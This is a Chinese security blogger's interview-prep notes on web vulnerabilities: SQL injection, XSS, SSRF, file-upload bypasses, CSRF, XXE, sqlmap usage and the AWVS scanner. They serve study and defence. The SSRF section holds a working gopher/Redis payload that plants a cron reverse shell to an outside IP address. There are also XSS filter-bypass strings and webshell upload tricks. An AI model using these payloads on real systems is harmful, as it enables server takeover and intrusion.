<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="P1taya">
    
    <title>
        
            面试prepare |
        
        P1taya
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/p1taya.jpg">
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/brands.min.css">
    
        
            
                
<link rel="stylesheet" href="/css/demo1.css">

            
        
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"P1taya","author":"P1taya","avatar":"/images/p1taya.jpg","logo":"/images/p1taya.jpg","favicon":"/images/p1taya.jpg"},"menu":{"home":"/ || fa-solid fa-home","archives":"/archives || fa-solid fa-box-archive","categories":"/categories || fa-solid fa-layer-group","links":"/links || fa-solid fa-link","about":"/about || fa-solid fa-user-graduate","photos":"/photos || fa-solid fa-image"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"人后的苦尚且还能克服 || 人前的尊严却无比脆弱","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"created || fa-solid fa-home","post_datetime_format":"YYYY-MM-DD HH:mm:ss"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":false,"reward":{"enable":false,"img_link":null,"text":null}},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"obsidian"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"jsdelivr"},"pjax":{"enable":false},"footer":{"since":2022,"word_count":true},"inject":{"enable":true,"css":["/css/demo1.css"],"js":[null]},"root":"","source_data":{"links":[{"name":"小黄dog","link":"https://wuster.store/","avatar":"https://wuster.store/images/favicon.ico"},{"name":"🐶狗and猫","link":"https://fushuling.com/","avatar":"https://fushuling-1309926051.cos.ap-shanghai.myqcloud.com/avatar.jpg"}]},"version":"4.1.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/p1taya.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               P1taya
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                
                                    <i class="menu-icon fa-solid fa-home"></i>
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                
                                    <i class="menu-icon fa-solid fa-box-archive"></i>
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                
                                    <i class="menu-icon fa-solid fa-layer-group"></i>
                                
                                分类
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                
                                    <i class="menu-icon fa-solid fa-link"></i>
                                
                                友链
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                
                                    <i class="menu-icon fa-solid fa-user-graduate"></i>
                                
                                关于
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/photos"
                            >
                                
                                    <i class="menu-icon fa-solid fa-image"></i>
                                
                                相册
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories"
                    >分类</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links"
                    >友链</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/photos"
                    >相册</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        面试prepare
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/p1taya.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">P1taya</span>
                                
                                    <span class="author-badge">Lv4</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2023-04-06 23:33:41</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Wed Apr 17 2024 16:42:59 GMT+0800">2024-04-17 16:42:59</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a></li>
                        
                    
                </ul>
            </span>
        

        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>7.7k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>29 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <h1 id="面试prepare"><a href="#面试prepare" class="headerlink" title="面试prepare"></a>面试prepare</h1><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>本人最近准备找一份暑期实习，于是自己写了一份面经</p>
<p>写的不好，仅供参考</p>
<h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h3><h4 id="常见的关系型数据库"><a href="#常见的关系型数据库" class="headerlink" title="常见的关系型数据库"></a><strong>常见的关系型数据库</strong></h4><p>mysql、sqlserver、oracle、access、sqlite、postgreSQL</p>
<ul>
<li><p>mysql:3306 </p>
</li>
<li><p>sqlserver:1433 </p>
</li>
<li><p>orecal:1521 </p>
</li>
<li><p>PostgreSQL:5432 </p>
</li>
<li><p>db2:50000</p>
</li>
<li><p>MongoDB:27017 </p>
</li>
<li><p>redis:6379 </p>
</li>
<li><p>memcached:11211</p>
</li>
</ul>
<h4 id="SQL注入有哪几种注入类型？"><a href="#SQL注入有哪几种注入类型？" class="headerlink" title="SQL注入有哪几种注入类型？"></a><strong>SQL注入有哪几种注入类型？</strong></h4><p>从注入参数类型分：数字型注入、字符型注入、搜索型注入<br>从注入方法分：基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入 ，</p>
<p>二次注入（参数传入的恶意数据在传入时被转义，但是在数据库处理时又被还原并存储在数据库中，导致二次注入）</p>
<p>从提交方式分：GET注入、POST注入、COOKIE注入、HTTP头注入</p>
<h4 id="SQL注入的危害及防御"><a href="#SQL注入的危害及防御" class="headerlink" title="SQL注入的危害及防御"></a><strong>SQL注入的危害及防御</strong></h4><p>危害</p>
<ul>
<li>数据库泄露 </li>
<li>数据库被破坏 </li>
<li>网站崩溃 </li>
<li>服务器被植入木马</li>
</ul>
<p>防御</p>
<ul>
<li>代码层面对查询参数进行转义 </li>
<li>预编译与参数绑定 </li>
<li>利用WAF防御</li>
</ul>
<h4 id="sql注入getshell"><a href="#sql注入getshell" class="headerlink" title="sql注入getshell"></a>sql注入getshell</h4><ul>
<li>存在SQL注入漏洞</li>
<li>web目录具有写入权限</li>
<li>找到网站的绝对路径</li>
<li>secure_file_priv没有具体值（secure_file_priv是用来限制load dumpfile、into outfile、load_file()函数在哪个目录下拥有上传和读取文件的权限。）</li>
</ul>
<h4 id="绕过方式"><a href="#绕过方式" class="headerlink" title="绕过方式"></a>绕过方式</h4><ul>
<li>大小写</li>
<li>双写</li>
<li>注释符  &#x2F;**&#x2F;</li>
<li>编码绕过 %20 %09 %0a</li>
<li>括号绕过</li>
<li>将表明转为十六进制绕过引号</li>
<li>join绕过逗号</li>
<li>like绕过等于号</li>
</ul>
<h3 id="xss"><a href="#xss" class="headerlink" title="xss"></a>xss</h3><h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p>xss的本质是javascript代码执行，所以说原理就是用户在可控参数输入恶意的js代码，然后该代码被执行成功</p>
<h4 id="如何验证存在xss漏洞"><a href="#如何验证存在xss漏洞" class="headerlink" title="如何验证存在xss漏洞"></a>如何验证存在xss漏洞</h4><p>第一步，寻找用户可控的参数（输入点）<br> 第二步，测试特殊符号，单引号、双引号、尖括号等是否被过滤或处理<br> 第三步，根据第二步测试结果进行操作，如过滤了事件类型的关键字，构造新的script标签去形成新的js环境，或者针对一些其它防护进行绕过</p>
<h4 id="xss有哪几种类型"><a href="#xss有哪几种类型" class="headerlink" title="xss有哪几种类型"></a>xss有哪几种类型</h4><h5 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h5><p>攻击者将带有恶意js代码的参数传递到网站的前端页面中，该代码不会传入服务器直接在客户的浏览器执行。</p>
<h5 id="反射性型XSS"><a href="#反射性型XSS" class="headerlink" title="反射性型XSS"></a>反射性型XSS</h5><p>攻击者将带有恶意js代码的参数传递给网站，经过服务器的然后返回到客户端，在客户的浏览器执行。</p>
<h5 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h5><p>攻击者将带有恶意js代码的参数传递给网站，经过服务器存储在数据库中，任何一个客户端在访问该条数据时，恶意的js代码都会在该客户端的浏览器执行。</p>
<h4 id="xss危害"><a href="#xss危害" class="headerlink" title="xss危害"></a>xss危害</h4><ul>
<li>盗用用户的COOKIE</li>
<li>修改DOM</li>
<li>插入广告（黑页等）</li>
<li>发动xss蠕虫攻击</li>
<li>劫持用户行为，进一步渗透内网</li>
</ul>
<h4 id="xss修复"><a href="#xss修复" class="headerlink" title="xss修复"></a>xss修复</h4><ul>
<li>在服务端进行输入检测，过滤特殊字符</li>
<li>对输出内容进行编码转义</li>
<li>在html中进行HTMLEncode，javascript中进行JavaScriptEncode，对使用javascriptEncode的变量都放在引号中并转义特殊字符，data部分就无法逃逸出引号成为代码中的一部分了，再严格一些，对所有字母之外的字符使用十六进制编码。</li>
<li>设置httponly为true</li>
</ul>
<h4 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h4><ul>
<li><p>双写</p>
</li>
<li><p>对不能构造script标签的情况下<br>使用事件进行绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;input  value=&#x27;123&#x27; onclick=&#x27;alert()&#x27;&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>超链接绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a src=javascript:alert()&gt;123&lt;/a&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="ssrf"><a href="#ssrf" class="headerlink" title="ssrf"></a>ssrf</h3><h4 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h4><p>服务端请求伪造（Server Side Request Forgery, SSRF）指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。</p>
<h4 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h4><p>SSRF可以对外网、服务器所在内网、本地进行端口扫描，攻击运行在内网或本地的应用，或者利用File协议读取本地文件。</p>
<p>内网服务防御相对外网服务来说一般会较弱，甚至部分内网服务为了运维方便并没有对内网的访问设置权限验证，所以存在SSRF时，通常会造成较大的危害。</p>
<h4 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h4><p>SSRF利用存在多种形式以及不同的场景，针对不同场景可以使用不同的利用和绕过方式。</p>
<p>以curl为例, 可以使用dict协议操作Redis、file协议读文件、gopher协议反弹Shell等功能，常见的Payload如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">curl -vvv &#x27;dict://127.0.0.1:6379/info&#x27;</span><br><span class="line"> </span><br><span class="line">curl -vvv &#x27;file:///etc/passwd&#x27;</span><br><span class="line"> </span><br><span class="line"># * 注意: 链接使用单引号，避免$变量问题</span><br><span class="line"> </span><br><span class="line">curl -vvv &#x27;gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i &gt;&amp; /dev/tcp/103.21.140.84/6789 0&gt;&amp;1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a&#x27;</span><br></pre></td></tr></table></figure>



<h4 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过"></a>绕过</h4><p>采用改编IP的写法的方式进行绕过，例如192.168.0.1这个IP地址可以被改写成</p>
<blockquote>
<ul>
<li><p>8进制格式：0300.0250.0.1</p>
</li>
<li><p>16进制格式：0xC0.0xA8.0.1</p>
</li>
<li><p>10进制整数格式：3232235521</p>
</li>
<li><p>16进制整数格式：0xC0A80001</p>
</li>
<li><p>合并后两位：1.1.278 &#x2F; 1.1.755</p>
</li>
<li><p>合并后三位：1.278 &#x2F; 1.755 &#x2F; 3.14159267</p>
</li>
<li><p>0.0.0.0这个IP可以直接访问到本地</p>
</li>
<li><p><code>xip.io</code> 提供了一个方便的服务，这个网站的子域名会解析到对应的IP，</p>
<p>例如192.168.0.1.xip.io，解析到192.168.0.1。</p>
</li>
</ul>
</blockquote>
<h4 id="防御方式"><a href="#防御方式" class="headerlink" title="防御方式"></a>防御方式</h4><blockquote>
<ul>
<li>过滤返回的信息</li>
<li>统一错误信息</li>
<li>限制请求的端口</li>
<li>禁止不常用的协议</li>
<li>对DNS Rebinding，考虑使用DNS缓存或者Host白名单</li>
</ul>
</blockquote>
<ol>
<li>限制访问方法只能使用GET</li>
<li>限制访问的协议只能是http或https，其他协议直接拒绝访问</li>
<li>检测特殊字符CRLF，存在则直接拒绝访问</li>
<li>设置setInstanceFollowRedirects属性为false，禁止跟随302跳转；禁止跳转的目的是防止攻击者利用跳转访问内网，从而绕过之后的黑名单校验</li>
<li>解析url中域名对应的ipv4地址：   <ol>
<li>该地址先过黑名单校验，不允许是内网地址，利用正则表达式对ip进行过滤</li>
<li><strong>使用ip对url中的域名进行替换，访问资源时都以ip进行访问</strong>；这样可以防御DNS Rebinding类的攻击</li>
</ol>
</li>
</ol>
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><h4 id="基本概念"><a href="#基本概念" class="headerlink" title="基本概念"></a>基本概念</h4><p>用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端的命令。</p>
<pre><code>常见的安全问题：
（1）上传的是脚本文件，服务器Web容器解释并执行了用户上传的脚本，导致代码执行。
（2）上传的文件是病毒、木马，引诱用户或者管理员进行下载执行。
（3）上传文件是钓鱼图片或者为包含了脚本的图片，在某些版本的浏览器中作为脚本执行，或被用于钓鱼欺诈。
</code></pre>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://cdn.jsdelivr.net/gh/R3damancy1/blog-pic/202404151439718.png"
                        alt="图片-1685330394483"
                 ></p>
<h4 id="文件上传漏洞方式"><a href="#文件上传漏洞方式" class="headerlink" title="文件上传漏洞方式"></a>文件上传漏洞方式</h4><p>1.客户端方式</p>
<p>主要方式就是JS检查。<br>绕过：<br>（1）首先选择正常的文件进行上传<br>（2）用BurpSuit进行抓包修改后缀然后完成文件上传.<br>2.绕过文件上传检查功能<br>（1）白名单校对——%00截断</p>
<p>因为在很多语言中，比如CorPHP等语言的常用字符串处理函数中,0x00都被认为是终止符。如xxx.php%00.jpg，.jpg绕过了应用的上传文件类型判断，但对于服务器来说，此文件因为0x00字符截断的关系，最终会变成xxx.php。<br>原理：URL中%00转换为ASCII字符是0，而ASCII中的0作为特殊字符保留，表示字符串结束。</p>
<h4 id="绕过-2"><a href="#绕过-2" class="headerlink" title="绕过"></a>绕过</h4><h5 id="htaccess文件"><a href="#htaccess文件" class="headerlink" title=".htaccess文件"></a>.htaccess文件</h5><blockquote>
<p>htaccess 在站点的根目录下面，不是在<a class="link"   target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=apache&spm=1001.2101.3001.7020" >apache<i class="fas fa-external-link-alt"></i></a>目录下，但是它属于apache的一个配置文件</p>
</blockquote>
<p>其中.htaccess文件内容：SetHandler application&#x2F;x-http-php的意思是设置当前目录所有文件都使用php解析，那么无论上传任何文件，只要符合php语言代码规范，就会被当做PHP执行。不符合规则则报错</p>
<h5 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h5><p>php.ini是php的一个全局配置文件，对整个web服务起作用；而.user.ini和.htaccess一样是目录的配置文件，.user.ini就是用户自定义的一个php.ini，我们可以利用这个文件来构造后门和隐藏后门。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file = &lt;filename&gt;         //包含在文件头</span><br><span class="line">auto_append_file = &lt;filename&gt;          //包含在文件尾</span><br></pre></td></tr></table></figure>

<p>于是我们可以先上传.user.ini，然后上传一句话木马，让所有文件都包含了一句话木马</p>
<h5 id="前端js绕过"><a href="#前端js绕过" class="headerlink" title="前端js绕过"></a>前端js绕过</h5><p>抓包直接修改</p>
<h5 id="黑白名单绕过可以上传"><a href="#黑白名单绕过可以上传" class="headerlink" title="黑白名单绕过可以上传"></a>黑白名单绕过可以上传</h5><p>phtml php3 php4 php5 Php php (空格) php.，pphphp</p>
<h5 id="修改content-type-添加GIF89a头"><a href="#修改content-type-添加GIF89a头" class="headerlink" title="修改content-type,添加GIF89a头"></a>修改content-type,添加GIF89a头</h5><h3 id="csrf"><a href="#csrf" class="headerlink" title="csrf"></a>csrf</h3><h4 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h4><p>攻击者利用服务器对用户的信任，从而欺骗受害者去服务器上执行受害者不知情的请求。</p>
<p>攻击者会伪造一个用户发送给服务器的正常链接，其核心主要是要和已登录（已认证）的用户去发请求。CSRF不需要知道用户的Cookie，CSRF自己并不会发请求给服务器，一切交给用户</p>
<h4 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h4><p>（1）避免在URL中明文显示特定操作的参数内容；</p>
<p>（2）使用同步令牌（Synchronizer Token）,检查客户端请求是否包含令牌及其有效性；（常用的做法，并且保证每次token的值完全随机且每次都不同）</p>
<p>（3）检查Referer Header，拒绝来自非本网站的直接URL请求。</p>
<p>（4）不要在客户端保存敏感信息（比如身份认证信息）；</p>
<p>（5）设置会话过期机制，比如20分钟无操作，直接登录超时退出；</p>
<p>（6）敏感信息的修改时需要对身份进行二次确认，比如修改账号时，需要判断旧密码；</p>
<p>（7）敏感信息的修改使用post而不是get</p>
<p>（8）避免交叉漏洞， 如XSS等</p>
<p>（9）禁止跨域访问</p>
<p>（10）在响应中设置CSP（Content-Security-Policy）内容安全策略</p>
<h4 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h4><p>XXE（XML External Entity Injection）也就是XML外部实体注入，XXE漏洞发生在应用程序解析XML输入时</p>
<p>服务端解析用户提交的XML文件时，未对XML文件引用的外部实体（含外部一般实体和外部参数实体）做合适的处理</p>
<p>导致可加载恶意外部文件 和 代码，造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起DOS攻击等危害。</p>
<h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><h4 id="常用指令"><a href="#常用指令" class="headerlink" title="常用指令"></a>常用指令</h4><p>-h                                           显示基本帮助信息</p>
<p>-hh                                         显示高级帮助信息</p>
<p>–version                                显示版本号</p>
<p>-v                                           详细等级（0-6 默认 1）<br>-u                                          指定目标url</p>
<p>-d                                          直接连接数据库</p>
<p>-l                                           从burp代理日志的解析目标</p>
<p>-r                                           从文件中加载http请求</p>
<p>-g                                          从google dork的结果作为目标url</p>
<p>-c                                          从INI配置文件中加载选项</p>
<ol>
<li><p>–purge      【重新扫描（–purge 删除原先对该目标扫描的记录）</p>
</li>
<li><p>–tables      【获取表名</p>
</li>
<li><p>–dbs         【检测站点包含哪些数据库</p>
</li>
<li><p>–current-db    【获取当前的数据库名</p>
</li>
<li><p>–current-user  【检测当前用户</p>
</li>
<li><p>–is-dba   【判断站点的当前用户是否为数据库管理员</p>
</li>
<li><p>–batch      【默认确认，不询问你是否输入</p>
</li>
<li><p>–search  【后面跟参数 -D -T -C 搜索列（C），表（T）和或数据库名称（D）</p>
</li>
<li><p>–threads 10  【线程，sqlmap线程最高设置为10</p>
</li>
<li><p>–level 3        【sqlmap默认测试所有的GET和POST参数，当–level的值大于等于2的时候也会测试HTTP Cookie头<br>                       的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5</p>
</li>
<li><p>–risk 3           【执行测试的风险（0-3，默认为1）risk越高，越慢但是越安全</p>
</li>
<li><p>-v   【详细的等级(0-6)<br>  0：只显示Python的回溯，错误和关键消息。<br>  1：显示信息和警告消息。<br>  2：显示调试消息。<br>  3：有效载荷注入。<br>  4：显示HTTP请求。<br>  5：显示HTTP响应头。<br>  6：显示HTTP响应页面的内容</p>
</li>
<li><p>–privileges  【查看权限</p>
</li>
<li><p>–tamper xx.py,cc.py   【防火墙绕过，后接tamper库中的py文件</p>
</li>
<li><p>–method “POST” –data “page&#x3D;1&amp;id&#x3D;2”   【POST方式提交数据</p>
</li>
<li><p>–threads number　　【采用多线程 后接线程数</p>
</li>
<li><p>–referer  “”  【使用referer欺骗</p>
</li>
<li><p>–user-agent “”     【自定义user-agent</p>
</li>
<li><p>–proxy “目标地址″   【使用代理注入</p>
</li>
</ol>
<p>1.指定目标url</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1&quot;</span><br></pre></td></tr></table></figure>

<p>2.从文件中获取多个url</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -m 1.txt</span><br></pre></td></tr></table></figure>

<p>3.从文件中加载HTTP请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r  url.txt</span><br></pre></td></tr></table></figure>

<p>4.利用google获取目标</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -g &quot;inurl:\&quot;.php?id=1\&quot;&quot;</span><br></pre></td></tr></table></figure>

<p>5.从burp日志中获取目标</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -l    burp.txt</span><br></pre></td></tr></table></figure>

<p>实例演示-sqlmap注入检测</p>
<p>1.GET参数注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1&quot;</span><br></pre></td></tr></table></figure>

<p>2.POST参数注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1&quot;  --data=&quot;id=1&quot;</span><br></pre></td></tr></table></figure>



<ol>
<li><p>sqlmap -u  “<a class="link"   target="_blank" rel="noopener" href="http://www.xx.com/?id=x" >http://www.xx.com?id=x<i class="fas fa-external-link-alt"></i></a>“    【查询是否存在注入点</p>
</li>
<li><p>–dbs         【检测站点包含哪些数据库</p>
</li>
<li><p>–current-db    【获取当前的数据库名</p>
</li>
<li><p>–tables -D “db_name”  【获取指定数据库中的表名 -D后接指定的数据库名称</p>
</li>
<li><p>–columns  -T “table_name” -D “db_name”  【获取数据库表中的字段</p>
</li>
<li><p>–dump -C “columns_name” -T “table_name” -D “db_name”  【获取字段的数据内容</p>
</li>
</ol>
<p>POST注入：</p>
<pre><code>（1）目标地址http:// www.xxx.com /login.asp
（2）打开brup代理。
（3）点击表单提交
（4）burp获取拦截信息（post）
（5）右键保存文件（.txt）到指定目录下
（6）运行sqlmap并执行如下命令：
</code></pre>
<p>用例：sqlmap -r okay.txt  -p  username</p>
<p>&#x2F;&#x2F; -r表示加载文件(及步骤（5）保存的路径)，-p指定参数（即拦截的post请求中表单提交的用户名或密码等name参数）</p>
<h3 id="AWVS"><a href="#AWVS" class="headerlink" title="AWVS"></a>AWVS</h3><h4 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h4><p>Acunetix Web Vulnerability Scanner（AWVS）可以扫描任何通过Web浏览器访问和遵循HTTP&#x2F;HTTPS规则的Web站点。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。</p>
<p>AWVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性。</p>
<h4 id="功能特点"><a href="#功能特点" class="headerlink" title="功能特点"></a>功能特点</h4><ul>
<li><p>自动的客户端脚本分析器，允许对Ajax和Web2.0应用程序进行安全性测试</p>
</li>
<li><p>业内最先进且深入的SQL注入和跨站脚本测试</p>
</li>
<li><p>高级渗透测试工具，例如HTPP Editor和HTTP Fuzzer</p>
</li>
<li><p>可视化宏记录器帮助您轻松测试web表格和受密码保护的区域</p>
</li>
<li><p>支持含有CAPTHCA的页面，单个开始指令和Two Factor（双因素）验证机制</p>
</li>
<li><p>丰富的报告功能，包括VISA PCI依从性报告</p>
</li>
<li><p>高速的多线程扫描器轻松检索成千上万的页面</p>
</li>
<li><p>智能爬行程序检测web服务器类型和应用程序语言</p>
</li>
